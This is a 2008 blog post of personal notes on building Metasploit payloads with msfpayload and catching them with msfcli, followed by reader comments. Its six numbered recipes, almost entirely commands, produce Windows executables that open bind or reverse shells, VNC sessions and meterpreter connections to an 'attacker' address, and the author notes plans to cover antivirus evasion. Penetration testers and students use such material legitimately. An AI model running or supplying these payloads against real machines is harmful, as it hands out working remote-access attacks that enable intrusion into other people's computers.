This entry is really just a place for me to keep notes on working msfpayload details. I will expand on this post as i get more working examples.
These payloads will be detected by AV, I will cover methods of avoiding AV detection in another post.
In my examples 192.168.1.110 is the victim, and 192.168.1.112 is the attacker. Where I have not specified the port it will default to 4444.
1. For a listening shell on the target
Create payload:
./msfpayload windows/shell_bind_tcp LPORT=2482 X > /tmp/Listen-shell.exe
Target:
run Listen-shell.exe
Hacker:
nc 192.168.1.110 2482
2. For a reverse shell on the target
Create payload:
./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.112 X > /tmp/reverse-shell.exe
Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.112 E
Target:
run reverse-shell.exe
3. For a VNC listener on target
Create payload:
./msfpayload windows/vncinject/bind_tcp LPORT=2482 X > Listen-vnc.exe
Target:
run Listen-vnc.exe
Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/bind_tcp LPORT=2482 RHOST=192.168.1.110 DisableCourtesyShell=TRUE E
4. For a reverse VNC session
Create payload:
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 X > /tmp/reverse-vnc.exe
Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 DisableCourtesyShell=TRUE E
Target:
run reverse-vnc.exe
5. For a meterpreter listener
create payload:
./msfpayload windows/meterpreter/bind_tcp LPORT=2482 X > met-listen.exe
Target:
run met-listen.exe
Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.1.110 LPORT=2482 E
6. For a reverse meterpreter connection (not working yet. not sure why)
Create payload:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.112 X > /tmp/met-reverse.exe
Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.112 E
Target:
run met-reverse.exe
This post was inspired by pauldotcom.
Friday, October 17, 2008
Metasploit Payloads - msfpayload
Subscribe to:
Post Comments (Atom)
6 comments:
you need to specify a port for #6
cheers Chris. I'll give that a go.
well, i bet he wanted port 4444. elsee he would have done differently. Thank you synjunkie! your work shows important msf functionality not covered in the documentation. Perhaps you would consider making contributions to the msf documentation. Often times, I come accross this belief that, if you cannot figure it out for yourself, you don't deserve to figure it out at all. I say: man ain't all there. . . that is the manual doesn't always enlighten thee full functionality of a of a program or tool set. Forgive my Bourbon influenced ramblings . . .
Hy thanks for the comment Overclucker.
I keep meaning to update this MSF post but I didn't think it was useful to anyone but me.
Have you checked out Chris Gates site (Carnal0wnage). He has loads of MSF stuff that makes mine look pityfull.
Keep drunk posting man!!!
Hey,
I'm a dude in Sweden, experimenting with BT3 on my EEE. Thx for posting this stuff, it helped me with pentesting a Win2000 laptop. Couldn't find any premade windows binary (.exe) file in BT3 that I could upload with meterpreter to start a VNC-server. Used your way and it worked like a charm. Nice blog too =)
No probs, really glad you found this stuff useful.
Cheers
Syn
Post a Comment